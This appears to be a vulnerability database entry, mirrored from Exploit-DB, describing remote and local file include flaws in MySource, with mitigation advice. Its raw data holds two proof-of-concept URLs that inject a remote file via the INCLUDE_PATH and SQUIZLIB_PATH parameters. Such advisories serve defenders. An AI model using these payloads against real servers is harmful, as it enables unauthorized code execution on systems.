header-logo
Suggest Exploit
vendor:
MySource
by:
Unknown
7.5
CVSS
HIGH
Remote and Local File Include
Unknown
CWE
Product Name: MySource
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Multiple Remote and Local File Include Vulnerabilities in MySource

The vulnerabilities are caused by a failure in the application to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process, potentially leading to unauthorized access.

Mitigation:

Proper input validation and sanitization should be implemented to prevent file inclusion vulnerabilities. Additionally, restricting access to sensitive files and directories can help mitigate the impact of these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15133/info

MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?

Navigation

Suggest Exploit

Services By CQR

cqrsecured